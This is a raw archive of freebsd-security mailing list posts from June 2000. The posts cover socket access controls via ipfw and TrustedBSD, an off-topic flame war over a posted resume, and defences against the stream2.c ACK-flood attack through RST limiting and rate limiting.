|Thanks, Jamie | | |To Unsubscribe: send mail to majordomo@FreeBSD.org |with "unsubscribe freebsd-security" in the body of the message | --------------------------------------------------------- Andrew Reiter Computer Security Engineer To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 20 16:30:46 2000 Delivered-To: freebsd-security@freebsd.org Received: from ints.ru (ints.ru [194.67.173.1]) by hub.freebsd.org (Postfix) with ESMTP id BFB9737B5A5 for ; Tue, 20 Jun 2000 16:30:42 -0700 (PDT) (envelope-from ilmar@ints.ru) Received: (from uucp@localhost) by ints.ru (8.9.2/8.9.2) id DAA23985; Wed, 21 Jun 2000 03:30:29 +0400 (MSD) Received: from ws-ilmar.ints.ru(194.67.173.16) via SMTP by ints.ru, id smtpdB23931; Wed Jun 21 03:30:24 2000 Date: Wed, 21 Jun 2000 03:30:24 +0400 (MSD) From: "Ilmar S. Habibulin" To: James Howard Cc: freebsd-security@FreeBSD.ORG Subject: Re: Network ACLs In-Reply-To: <200006202237.SAA20291@rac10.wam.umd.edu> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, 20 Jun 2000, James Howard wrote: > I know that the TrustedBSD group is working on filesystem ACLs. Will > something similar be extended to the socket interface? And what do you want to do with sockets? Something simular to packet filtering based on uids or you want to control access to socket functions? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 20 17:37:32 2000 Delivered-To: freebsd-security@freebsd.org Received: from yoda.fdt.net (yoda.fdt.net [209.212.128.32]) by hub.freebsd.org (Postfix) with ESMTP id DC43537B988; Tue, 20 Jun 2000 17:37:25 -0700 (PDT) (envelope-from flaboy@gnv.fdt.net) Received: from localhost (flaboy@localhost) by yoda.fdt.net with ESMTP id UAA16815; Tue, 20 Jun 2000 20:37:19 -0400 Date: Tue, 20 Jun 2000 20:37:18 -0400 (EDT) From: Joe Barnhart X-Sender: flaboy@yoda.fdt.net To: Duncan de Verteuil Cc: freebsd-isp@FreeBSD.ORG, freebsd-security@FreeBSD.ORG Subject: Re: Resume... In-Reply-To: <00dc01bfdae7$499eaee0$20c1f5cf@directinternet.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org And people wonder why linux is getting so much more...it might just be because of the *attitudes* on the *bsd lists... This is but one of so many I have saved showing nothing but contempt for people. Oh well, keep being sound blaster compatible...you know, having support for linux apps instead of attracting the companies to write a direct port for you. Pitiful. JB On Tue, 20 Jun 2000, Duncan de Verteuil wrote: > > ----- Original Message ----- > From: H. Eckert > To: ; > Cc: > Sent: Saturday, June 17, 2000 9:16 PM > Subject: Re: Resume... > > > > Quoting Jason L. Schwab (jlschwab@uswest.net): > > > X-Mailer: Microsoft Outlook Express 5.00.2615.200 > > > I am 17 years of age. > > > I consider my self a professional unix system administrator. > > > > Consider yourself lucky to be qualified to admin a microwave > > at a fastfood restaurant. This might even help you to get a > > chance to get a real qualification in the near future. > > > > Greetings, > > Ripley > > > > > Aren't YOU one arrogant piece of... *shakes head* > I am disgusted. > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-isp" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 20 17:43:26 2000 Delivered-To: freebsd-security@freebsd.org Received: from pogo.caustic.org (pogo.caustic.org [208.44.193.69]) by hub.freebsd.org (Postfix) with ESMTP id C4D8237B7DB; Tue, 20 Jun 2000 17:43:20 -0700 (PDT) (envelope-from jan@caustic.org) Received: from localhost (jan@localhost) by pogo.caustic.org (8.10.0/ignatz) with ESMTP id e5L0hE328824; Tue, 20 Jun 2000 17:43:14 -0700 (PDT) Date: Tue, 20 Jun 2000 17:43:13 -0700 (PDT) From: "f.johan.beisser" To: Joe Barnhart Cc: Duncan de Verteuil , freebsd-isp@FreeBSD.ORG, freebsd-security@FreeBSD.ORG Subject: Re: Resume... In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org because i'm wading through this, i think i'll be nice, and ask you folks to move this to -chat, or possably off the lists alltogether. thanks much. -- jan On Tue, 20 Jun 2000, Joe Barnhart wrote: > And people wonder why linux is getting so much more...it might just be > because of the *attitudes* on the *bsd lists... > > This is but one of so many I have saved showing nothing but contempt for > people. Oh well, keep being sound blaster compatible...you know, having > support for linux apps instead of attracting the companies to write a > direct port for you. > > Pitiful. > > JB > > > On Tue, 20 Jun 2000, Duncan de Verteuil wrote: > > > > > ----- Original Message ----- > > From: H. Eckert > > To: ; > > Cc: > > Sent: Saturday, June 17, 2000 9:16 PM > > Subject: Re: Resume... > > > > > > > Quoting Jason L. Schwab (jlschwab@uswest.net): > > > > X-Mailer: Microsoft Outlook Express 5.00.2615.200 > > > > I am 17 years of age. > > > > I consider my self a professional unix system administrator. > > > > > > Consider yourself lucky to be qualified to admin a microwave > > > at a fastfood restaurant. This might even help you to get a > > > chance to get a real qualification in the near future. > > > > > > Greetings, > > > Ripley > > > > > > > > Aren't YOU one arrogant piece of... *shakes head* > > I am disgusted. > > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-isp" in the body of the message > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > +-----/ f. johan beisser /------------------------------+ email: jan[at]caustic.org web: http://www.caustic.org/~jan "knowledge is power. power corrupts. study hard, be evil." To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 20 17:52:14 2000 Delivered-To: freebsd-security@freebsd.org Received: from yoda.fdt.net (yoda.fdt.net [209.212.128.32]) by hub.freebsd.org (Postfix) with ESMTP id 18C9737B860; Tue, 20 Jun 2000 17:52:06 -0700 (PDT) (envelope-from flaboy@gnv.fdt.net) Received: from localhost (flaboy@localhost) by yoda.fdt.net with ESMTP id UAA18340; Tue, 20 Jun 2000 20:51:54 -0400 Date: Tue, 20 Jun 2000 20:51:54 -0400 (EDT) From: Joe Barnhart X-Sender: flaboy@yoda.fdt.net To: XuYifeng Cc: Duncan de Verteuil , freebsd-isp@FreeBSD.ORG, freebsd-security@FreeBSD.ORG Subject: Re: Resume... In-Reply-To: <000701bfdb1a$3c1b54c0$1701a8c0@xu> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I agree. I'm so sad to see however, replies to people that are so much less than professional (not that we have to necessarily be such all the time). I'm convinced that some of the problem is attitudes and the unwillingness to be open and help. People move and go to communities that they feel better being a part of. I can only wonder how many people we have lost here to linux that might have asked a question and ended up being treated like sh**. Hey, it won't happen but once to me, and I run an ISP with a wide variety of OS's. Nothin is very warm here, nor on the BSDI lists either. It's hurting the entire community, just sub to some of the linux lists and see for yourself how the help flows. It made it commercial, it started early and earned itself a rep for cooperation not spitefulness. JB On Wed, 21 Jun 2000, XuYifeng wrote: > don't try the change someboday's attitudes in bsd lists, it's tooo > difficult :( > also , I admit bsd has better technology, but Linux is more commercial, > BSD's very > important problem is there hasn't any enterprise level database system, it's > a pain. > > XuYifeng > > ----- Original Message ----- > From: "Joe Barnhart" > To: "Duncan de Verteuil" > Cc: ; > Sent: Wednesday, June 21, 2000 8:37 AM > Subject: Re: Resume... > > > > And people wonder why linux is getting so much more...it might just be > > because of the *attitudes* on the *bsd lists... > > > > This is but one of so many I have saved showing nothing but contempt for > > people. Oh well, keep being sound blaster compatible...you know, having > > support for linux apps instead of attracting the companies to write a > > direct port for you. > > > > Pitiful. > > > > JB > > > > > > On Tue, 20 Jun 2000, Duncan de Verteuil wrote: > > > > > > > > ----- Original Message ----- > > > From: H. Eckert > > > To: ; > > > Cc: > > > Sent: Saturday, June 17, 2000 9:16 PM > > > Subject: Re: Resume... > > > > > > > > > > Quoting Jason L. Schwab (jlschwab@uswest.net): > > > > > X-Mailer: Microsoft Outlook Express 5.00.2615.200 > > > > > I am 17 years of age. > > > > > I consider my self a professional unix system administrator. > > > > > > > > Consider yourself lucky to be qualified to admin a microwave > > > > at a fastfood restaurant. This might even help you to get a > > > > chance to get a real qualification in the near future. > > > > > > > > Greetings, > > > > Ripley > > > > > > > > > > > Aren't YOU one arrogant piece of... *shakes head* > > > I am disgusted. > > > > > > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > > with "unsubscribe freebsd-isp" in the body of the message > > > > > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > /---------------------------- 352-372-5100 -------------------------------\ | Joseph Barnhart | IRC | Gainesville, Tallahassee, | | FDT Network Administrator | Front Page | Ocala, Tampa & St. Pete. | | Florida Digital Turnpike | 56k Dialup | Pensacola, Jacksonville and | | http://www.fdt.net | ISDN T1 | Miami. Megapop and Ipass | | joseph.barnhart@fdt.net | Web Hosting | National access. | | | Unix Shells | | \---------------------------- 850-222-5200 -------------------------------/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 20 18: 4:52 2000 Delivered-To: freebsd-security@freebsd.org Received: from pogo.caustic.org (pogo.caustic.org [208.44.193.69]) by hub.freebsd.org (Postfix) with ESMTP id 701C737B754 for ; Tue, 20 Jun 2000 18:04:49 -0700 (PDT) (envelope-from jan@caustic.org) Received: from localhost (jan@localhost) by pogo.caustic.org (8.10.0/ignatz) with ESMTP id e5L14xF28879; Tue, 20 Jun 2000 18:04:59 -0700 (PDT) Date: Tue, 20 Jun 2000 18:04:59 -0700 (PDT) From: "f.johan.beisser" To: James Howard Cc: freebsd-security@FreeBSD.ORG Subject: Re: Network ACLs In-Reply-To: <200006202237.SAA20291@rac10.wam.umd.edu> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org on freebsd-ipfw there's a thread about UID controls, which may interest you, and may be related to this. there's a set patch for testing, which i've not had a chance to try out just yet. On Tue, 20 Jun 2000, James Howard wrote: > I know that the TrustedBSD group is working on filesystem ACLs. Will > something similar be extended to the socket interface? > > Thanks, Jamie > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > +-----/ f. johan beisser /------------------------------+ email: jan[at]caustic.org web: http://www.caustic.org/~jan "knowledge is power. power corrupts. study hard, be evil." To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 20 18: 4:54 2000 Delivered-To: freebsd-security@freebsd.org Received: from po4.wam.umd.edu (po4.wam.umd.edu [128.8.10.166]) by hub.freebsd.org (Postfix) with ESMTP id 782BE37B8F6 for ; Tue, 20 Jun 2000 18:04:50 -0700 (PDT) (envelope-from howardjp@wam.umd.edu) Received: from rac6.wam.umd.edu (root@rac6.wam.umd.edu [128.8.10.146]) by po4.wam.umd.edu (8.9.3/8.9.3) with ESMTP id VAA20564; Tue, 20 Jun 2000 21:04:48 -0400 (EDT) Received: from rac6.wam.umd.edu (sendmail@localhost [127.0.0.1]) by rac6.wam.umd.edu (8.9.3/8.9.3) with SMTP id VAA07287; Tue, 20 Jun 2000 21:04:45 -0400 (EDT) Received: from rac6.wam.umd.edu (howardjp@localhost) by rac6.wam.umd.edu (8.9.3/8.9.3) with ESMTP id VAA07282; Tue, 20 Jun 2000 21:04:45 -0400 (EDT) Message-Id: <200006210104.VAA07282@rac6.wam.umd.edu> X-Authentication-Warning: rac6.wam.umd.edu: howardjp owned process doing -bs To: "Ilmar S. Habibulin" Cc: freebsd-security@freebsd.org Subject: Re: Network ACLs In-reply-to: Your message of "Wed, 21 Jun 2000 03:30:24 +0400." Date: Tue, 20 Jun 2000 21:04:39 -0400 From: James Howard Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message , "Ilmar S. Habibulin" writes: > And what do you want to do with sockets? Something simular to packet > filtering based on uids or you want to control access to socket functions? I want to be able to create a group called "inet" and anyone who is a member of that group may open connections. However, they may not listen. Root can do anything he/she wants. Nobody else can do anything. I run a freenet and I want to limit outgoing connections to paying users. Jamie To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 20 18:30:12 2000 Delivered-To: freebsd-security@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 2B41B37BCAC; Tue, 20 Jun 2000 18:30:09 -0700 (PDT) (envelope-from kris@FreeBSD.org) Received: from localhost (kris@localhost) by freefall.freebsd.org (8.9.3/8.9.2) with ESMTP id SAA54105; Tue, 20 Jun 2000 18:30:09 -0700 (PDT) (envelope-from kris@FreeBSD.org) X-Authentication-Warning: freefall.freebsd.org: kris owned process doing -bs Date: Tue, 20 Jun 2000 18:30:08 -0700 (PDT) From: Kris Kennaway To: James Howard Cc: "Ilmar S. Habibulin" , freebsd-security@freebsd.org Subject: Re: Network ACLs In-Reply-To: <200006210104.VAA07282@rac6.wam.umd.edu> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, 20 Jun 2000, James Howard wrote: > I want to be able to create a group called "inet" and anyone who is a > member of that group may open connections. However, they may not > listen. Root can do anything he/she wants. Nobody else can do anything. ipfw can filter based on uid and gid Kris -- In God we Trust -- all others must submit an X.509 certificate. -- Charles Forsythe To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 20 22:17: 9 2000 Delivered-To: freebsd-security@freebsd.org Received: from cr31617-a.lndn1.on.wave.home.com (cr31617-a.lndn1.on.wave.home.com [24.112.227.163]) by hub.freebsd.org (Postfix) with ESMTP id 9250137B84D for ; Tue, 20 Jun 2000 22:17:00 -0700 (PDT) (envelope-from jbailie@cr31617-a.lndn1.on.wave.home.com) Received: (from jbailie@localhost) by cr31617-a.lndn1.on.wave.home.com (8.9.3/8.9.3) id BAA56344 for freebsd-security@FreeBSD.ORG; Wed, 21 Jun 2000 01:16:59 -0400 (EDT) (envelope-from jbailie) Date: Wed, 21 Jun 2000 01:16:59 -0400 From: James Bailie To: freebsd-security@FreeBSD.ORG Subject: Re: Resume... Message-ID: <20000621011659.A56241@cr31617-a.lndn1.on.wave.home.co> References: <86256904.006E24B6.00@MCSMTP.MC.VANDERBILT.EDU> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2i In-Reply-To: <86256904.006E24B6.00@MCSMTP.MC.VANDERBILT.EDU>; from George.Giles@mcmail.vanderbilt.edu on Tue, Jun 20, 2000 at 03:10:19PM -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, Jun 20, 2000 at 03:10:19PM -0500, George.Giles@mcmail.vanderbilt.edu wrote: > Arrogance is a prussian characteristic, that has caused much misery over the > years. I guess you were never a teenager! Being a plucky young turk, bragging, exaggerating your hacking accomplishments is tantamount to Prussian authoritarianism/militarism? Har! This kid, if he has the brains and industry to match his passion might go further than any of us. Hell, knowledge of HTML and a bit-o-Perl has made more than one teenage millionaire in my hometown. -- James Bailie http://jazzturkey.net/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 20 23:27:50 2000 Delivered-To: freebsd-security@freebsd.org Received: from fep7.mail.ozemail.net (fep7-old.mail.ozemail.net [203.2.192.99]) by hub.freebsd.org (Postfix) with ESMTP id 9706037B809 for ; Tue, 20 Jun 2000 23:27:45 -0700 (PDT) (envelope-from adriangp@ozemail.com.au) Received: from prodigy (slmel62p31.ozemail.com.au [203.108.207.95]) by fep7.mail.ozemail.net (8.9.0/8.6.12) with SMTP id QAA17209 for ; Wed, 21 Jun 2000 16:27:42 +1000 (EST) Message-ID: <037e01bfdb4a$3ec405c0$e2308490@prodigy> From: "Adrian Portelli" To: Subject: Date: Wed, 21 Jun 2000 16:30:50 +1000 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.2919.6700 X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2919.6700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org auth 09386373 unsubscribe freebsd-security adriangp@ozemail.com.au To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 21 0:20:13 2000 Delivered-To: freebsd-security@freebsd.org Received: from ints.ru (ints.ru [194.67.173.1]) by hub.freebsd.org (Postfix) with ESMTP id D2B4837BC09 for ; Wed, 21 Jun 2000 00:19:59 -0700 (PDT) (envelope-from ilmar@ints.ru) Received: (from uucp@localhost) by ints.ru (8.9.2/8.9.2) id LAA10757; Wed, 21 Jun 2000 11:19:54 +0400 (MSD) Received: from ws-ilmar.ints.ru(194.67.173.16) via SMTP by ints.ru, id smtpdy10755; Wed Jun 21 11:19:48 2000 Date: Wed, 21 Jun 2000 11:19:48 +0400 (MSD) From: "Ilmar S. Habibulin" To: James Howard Cc: freebsd-security@FreeBSD.ORG Subject: Re: Network ACLs In-Reply-To: <200006210104.VAA07282@rac6.wam.umd.edu> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, 20 Jun 2000, James Howard wrote: > I want to be able to create a group called "inet" and anyone who is a > member of that group may open connections. However, they may not > listen. Root can do anything he/she wants. Nobody else can do anything. Well, then you need a posix capabilities plus file ACLs of TrusdedBSD. If you are interested in TrustedBSD features. But they are not fully implemented right now. To solve you problem you can use advices to use ipfw uid/gid filtering option, because TrustedBSD is far from being finished. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 21 2:37: 4 2000 Delivered-To: freebsd-security@freebsd.org Received: from tts.tomsk.su (tts.tomsk.su [212.20.50.9]) by hub.freebsd.org (Postfix) with ESMTP id CDC5537B846 for ; Wed, 21 Jun 2000 02:36:59 -0700 (PDT) (envelope-from maksim@tts.tomsk.su) Received: from dragonland (unverified [212.20.50.12]) by tts.tomsk.su (Rockliffe SMTPRA 2.1.6) with SMTP id for ; Wed, 21 Jun 2000 17:36:56 +0800 From: "Maksimov Maksim" To: Subject: How defend from stream2.c attack? Date: Wed, 21 Jun 2000 17:36:57 +0800 Message-ID: <000401bfdb64$3eae8320$0c3214d4@dragonland.tts.tomsk.su> MIME-Version: 1.0 Content-Type: text/plain; charset="koi8-r" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook 8.5, Build 4.71.2173.0 X-MimeOLE: Produced By Microsoft MimeOLE V4.72.3612.1700 Importance: Normal Disposition-Notification-To: "Maksimov Maksim" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org How defend from stream2.c attack (flooding ACK-packets) on my FreeBSD box? I install FreeBSD 4.0-20000608-STABLE, but stream2.c attack freezed this FreeBSD box as before! Help! Best regards, Maks Maksimov mailto:maksim@tts.tomsk.su To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 21 4:19:12 2000 Delivered-To: freebsd-security@freebsd.org Received: from haldjas.folklore.ee (Haldjas.folklore.ee [193.40.6.121]) by hub.freebsd.org (Postfix) with ESMTP id D9EE437BDB0; Wed, 21 Jun 2000 04:19:06 -0700 (PDT) (envelope-from narvi@haldjas.folklore.ee) Received: from localhost (narvi@localhost) by haldjas.folklore.ee (8.9.3/8.9.3) with SMTP id NAA93339; Wed, 21 Jun 2000 13:18:48 +0200 (EET) (envelope-from narvi@haldjas.folklore.ee) Date: Wed, 21 Jun 2000 13:18:48 +0200 (EET) From: Narvi To: Joe Barnhart Cc: Duncan de Verteuil , freebsd-isp@FreeBSD.ORG, freebsd-security@FreeBSD.ORG Subject: Re: Resume... In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org *OH* *MY* *GOD*!!! Why can't you people act more resposibly than the original poster and **NOT** post it to lists it doesn't belong, namely, -security and -isp? This doesn't belong in any of the two. On Tue, 20 Jun 2000, Joe Barnhart wrote: > And people wonder why linux is getting so much more...it might just be > because of the *attitudes* on the *bsd lists... > > This is but one of so many I have saved showing nothing but contempt for > people. Oh well, keep being sound blaster compatible...you know, having > support for linux apps instead of attracting the companies to write a > direct port for you. > > Pitiful. > > JB > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 21 7:56:34 2000 Delivered-To: freebsd-security@freebsd.org Received: from lariat.org (lariat.org [12.23.109.2]) by hub.freebsd.org (Postfix) with ESMTP id AEC8437B780 for ; Wed, 21 Jun 2000 07:56:31 -0700 (PDT) (envelope-from brett@lariat.org) Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.org [12.23.109.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id IAA20975; Wed, 21 Jun 2000 08:56:19 -0600 (MDT) Message-Id: <4.3.2.7.2.20000621085414.045fdaa0@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Wed, 21 Jun 2000 08:55:53 -0600 To: "Maksimov Maksim" , From: Brett Glass Subject: Re: How defend from stream2.c attack? In-Reply-To: <000401bfdb64$3eae8320$0c3214d4@dragonland.tts.tomsk.su> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Have you turned on the kernel flag that restricts emission of RST packets? I am not sure, but I think that Matt -- who is a stickler for RFC compliance -- may have set things up so that one must recompile the kernel before the flag will work. --Brett At 03:36 AM 6/21/2000, Maksimov Maksim wrote: >How defend from stream2.c attack (flooding ACK-packets) on my FreeBSD box? >I install FreeBSD 4.0-20000608-STABLE, but stream2.c attack freezed this >FreeBSD box as before! >Help! > >Best regards, >Maks Maksimov mailto:maksim@tts.tomsk.su > > > > > > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 21 8:33:24 2000 Delivered-To: freebsd-security@freebsd.org Received: from almso1.proxy.att.com (almso1.att.com [192.128.167.69]) by hub.freebsd.org (Postfix) with ESMTP id 9587B37BD3B; Wed, 21 Jun 2000 08:33:05 -0700 (PDT) (envelope-from fastd@att.com) Received: from gab200r1.ems.att.com ([135.37.94.32]) by almso1.proxy.att.com (AT&T IPNS/MSO-2.2) with ESMTP id LAA19467; Wed, 21 Jun 2000 11:32:57 -0400 (EDT) Received: from mo3980bh2.ems.att.com by gab200r1.ems.att.com (8.8.8+Sun/ATTEMS-1.4.1 sol2) id LAA29940; Wed, 21 Jun 2000 11:34:30 -0400 (EDT) Received: by mo3980bh2.ems.att.com with Internet Mail Service (5.5.2650.21) id ; Wed, 21 Jun 2000 10:32:56 -0500 Message-ID: <5D6D2EC6E987D31199EC00902799EC4A020A7BBF@mo3980po01.ems.att.com> From: "Fast, Daniel H (Danny), SITS" To: "'Narvi'" , Joe Barnhart Cc: Duncan de Verteuil , freebsd-isp@FreeBSD.ORG, freebsd-security@FreeBSD.ORG Subject: RE: Resume... Date: Wed, 21 Jun 2000 10:32:48 -0500 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2650.21) Content-Type: text/plain; charset="iso-8859-1" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I have been holding back to respond.......but I will now. This guy, original poster of the his Resume, it does not belong on the list. I did not subscribe to a list to be shot marketing nor am I looking for employees [different sites/lists for that]. His enthusiasm, cockiness, or skills is irrelevant, Gates/Linus could post his....and would still not be appropriate to the list [thumps fist to chest]. I am sure he is a nice guy, just young...may or may not know better...now, can the "RE: Resume" stuff stop? Just my $1.50, anyone got change? :] Danny -----Original Message----- From: Narvi [mailto:narvi@haldjas.folklore.ee] Sent: Wednesday, June 21, 2000 04:19 AM To: Joe Barnhart Cc: Duncan de Verteuil; freebsd-isp@FreeBSD.ORG; freebsd-security@FreeBSD.ORG Subject: Re: Resume... *OH* *MY* *GOD*!!! Why can't you people act more resposibly than the original poster and **NOT** post it to lists it doesn't belong, namely, -security and -isp? This doesn't belong in any of the two. On Tue, 20 Jun 2000, Joe Barnhart wrote: > And people wonder why linux is getting so much more...it might just be > because of the *attitudes* on the *bsd lists... > > This is but one of so many I have saved showing nothing but contempt for > people. Oh well, keep being sound blaster compatible...you know, having > support for linux apps instead of attracting the companies to write a > direct port for you. > > Pitiful. > > JB > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 21 8:36:24 2000 Delivered-To: freebsd-security@freebsd.org Received: from builder.FreeBSD.ORG (builder.FreeBSD.ORG [204.216.27.24]) by hub.freebsd.org (Postfix) with ESMTP id 5525237BE76; Wed, 21 Jun 2000 08:36:20 -0700 (PDT) (envelope-from green@FreeBSD.org) Date: Wed, 21 Jun 2000 08:38:37 -0700 (PDT) From: Brian Fundakowski Feldman To: James Howard Cc: freebsd-security@freebsd.org Subject: Re: Network ACLs In-Reply-To: <200006202237.SAA20291@rac10.wam.umd.edu> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, 20 Jun 2000, James Howard wrote: > I know that the TrustedBSD group is working on filesystem ACLs. Will > something similar be extended to the socket interface? Robert Watson and I were discussing this and ACLs in general over the day, and yes, at one point, I will make sure that sockets have ACL information. Basically, the information must be that it inherits the parent's credentials, but right now the parents credentials are still ucred and not ACLs. It'll come along when ACLs become more pervasive, perhaps after Poligraph is done if that is what it takes. We'll see :) > Thanks, Jamie -- Brian Fundakowski Feldman / "Any sufficiently advanced bug is \ green@FreeBSD.org | indistinguishable from a feature." | FreeBSD: The Power to Serve! \ -- Rich Kulawiec / To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 21 8:47:31 2000 Delivered-To: freebsd-security@freebsd.org Received: from ixori.demon.nl (ixori.demon.nl [195.11.248.5]) by hub.freebsd.org (Postfix) with ESMTP id F387537B7BD for ; Wed, 21 Jun 2000 08:47:08 -0700 (PDT) (envelope-from bart@ixori.demon.nl) Received: from smtp-relay by ixori.demon.nl (8.9.3/8.9.2) with ESMTP id RAA01708; Wed, 21 Jun 2000 17:50:35 +0200 (CEST) (envelope-from bart@ixori.demon.nl) Received: from network (intranet) by smtp-relay (Bart's intranet smtp server) Date: Wed, 21 Jun 2000 17:51:19 +0200 (CEST) From: Bart van Leeuwen To: Brett Glass Cc: Maksimov Maksim , freebsd-security@freebsd.org Subject: Re: How defend from stream2.c attack? In-Reply-To: <4.3.2.7.2.20000621085414.045fdaa0@localhost> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org It looks like the assumption that you need to build a new kernel for getting the option to limit sending out RSTs is correct. (the GENERIC config file doesn't contain the options, and sysctl shows the vars aren't there ;-) You'll need to add the correct lines to the config file... not just recompile, but I guess thats obvious to all except for a very inexperienced user. What I do wonder about however is if that option will help here. I can see how it would help against syn floods and maybe syn+ack floods. To me it seems like tis solves a bandwidth saturation problem, not a local freeze of the machine (tho it could because of just not running out of resources due to this restriction maybe). I'd be very interested to hear why it might help here to enhance my understanding of tcp/ip and fbsd's stack. btw, imho limiting RST on SYN+ACK might very well cause syn flooding another host when some bugger happens to use your IP as a decoy in an nmap scan for example. If nothing else works then you could always rate limit or drop those packets (or possible replies) with a statefull ipfw + dummynet ;-) Oh... which stream2.c do you mean? (I have a couple of files by that name on my system, and knowing which one you are talking about might help to provide you with a tested and much more concrete solution if there is any ;-) Bart van Leeuwen ----------------------------------------------------------- mailto:bart@ixori.demon.nl - http://www.ixori.demon.nl/ ----------------------------------------------------------- On Wed, 21 Jun 2000, Brett Glass wrote: > Have you turned on the kernel flag that restricts emission of > RST packets? I am not sure, but I think that Matt -- who is a > stickler for RFC compliance -- may have set things up so that > one must recompile the kernel before the flag will work. > > --Brett > > At 03:36 AM 6/21/2000, Maksimov Maksim wrote: > > >How defend from stream2.c attack (flooding ACK-packets) on my FreeBSD box? > >I install FreeBSD 